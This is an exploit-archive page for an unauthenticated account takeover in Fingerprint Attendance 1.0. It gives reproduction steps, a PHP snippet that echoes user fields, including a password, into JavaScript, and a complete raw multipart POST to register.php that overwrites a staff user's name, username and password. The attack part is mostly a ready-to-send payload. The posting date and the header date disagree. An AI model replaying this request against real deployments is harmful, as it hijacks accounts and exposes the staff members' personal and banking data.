Fingerprint Attendance 1.0 Account Takeover

Fingerprint Attendance 1.0 Account Takeover: Posted Mar 29, 2022; Authored by Hejap Zairy; Fingerprint Attendance version 1.0 allows for an arbitrary password reset of any user.; tags | exploit, arbitrary, bypass; SHA-256 | 349d72455afa61c19576dd3b35d2b351fb9e9242b3dc49747aede103705ebd0b; Download | Favorite | View

Fingerprint Attendance 1.0 Account Takeover

# Title: Fingerprint Attendance 1.0  Account Takeover 
# Author: Hejap Zairy
# Date: 29.07.2022
# Vendor: https://www.vetbossel.in/fingerprint-attendance-project-php/
# Software: https://app.box.com/s/xlyqalhvayq8oi25tqykcbouzrrjytqy
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache

Fingerprint Attendance  is vulnerable to unauthenticated account takeover.
An attacker can takeover any registered 'Staff' user account by just sending below POST request
By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters

#Steps to Reproduce

1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" ,"type" parameters.

2. Go to  /fingerprint/src/ and Log in to the user account by changed username and password


#vulnerability Code  php

```
<?php
    echo "document.getElementById('fname').value = '".$qry["first_name"]."';";
    echo "document.getElementById('lname').value = '".$qry["last_name"]."';";

    echo "document.getElementById('NRIC').value = '".$qry["NRIC"]."';";
    echo "document.getElementById('email').value = '".$qry["email"]."';";
    echo "document.getElementById('contact').value = '".$qry["mobile"]."';";
    echo "document.getElementById('contact2').value = '".$qry["mobile2"]."';";

    echo "document.getElementById('line1').value = '".$qry["password"]."';";
    echo "document.getElementById('line2').value = '".$qry["line1"]."';";
    echo "document.getElementById('line3').value = '".$qry["line2"]."';";
    echo "document.getElementById('city').value = '".$qry["city"]."';";
    echo "document.getElementById('zip').value = '".$qry["zip"]."';";
    echo "document.getElementById('country').value = '".$qry["country"]."';";

    echo "document.getElementById('bankName').value = '".$qry["bankName"]."';";
    echo "document.getElementById('bankDetail').value = '".$qry["bankDetail"]."';";

    echo "document.getElementById('job').value = '".$qry["jobTitle"]."';";
  ?>
```


# Description:
Account takeover is one form of identity theft attack in which bad actors gain access to an account and make unauthorized transactions. Account takeover attacks can target any website that uses a login to guard valuable information


[+] Payload POST

```
POST /fingerprint/src/register.php HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3324626841792192532944123116
Content-Length: 2446
Origin: http://0day.gov
Connection: close
Referer: http://0day.gov/fingerprint/src/register.php
Cookie: PHPSESSID=64cp9kf4qmus9p55o63clicu2q
Upgrade-Insecure-Requests: 1

-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="fname"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="lname"

admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="NRIC"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="emailaddress"
Admin@gmail.com
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="contact"

admin

-----------------------------3324626841792192532944123116

Content-Disposition: form-data; name="contact2"
admin
-----------------------------3324626841792192532944123116

Content-Disposition: form-data; name="password"
admin12345
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="line2"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="line3"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="city"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="zip"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="country"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="bankName"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="bankDetail"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="job"
Admin

-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="button"
Register
-----------------------------3324626841792192532944123116--
```

Top Authors In Last 30 Days

Red Hat 219 files
Jay Turla 150 files
indoushka 143 files
Ubuntu 60 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
Gentoo 33 files
H D Moore 31 files
Debian 29 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,114)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (50,978)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,661)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,794)
UNIX (9,443)
UnixWare (187)
Windows (6,756)
Other

Fingerprint Attendance 1.0 Account Takeover

Fingerprint Attendance 1.0 Account Takeover

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Fingerprint Attendance 1.0 Account Takeover

Share This

Fingerprint Attendance 1.0 Account Takeover

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems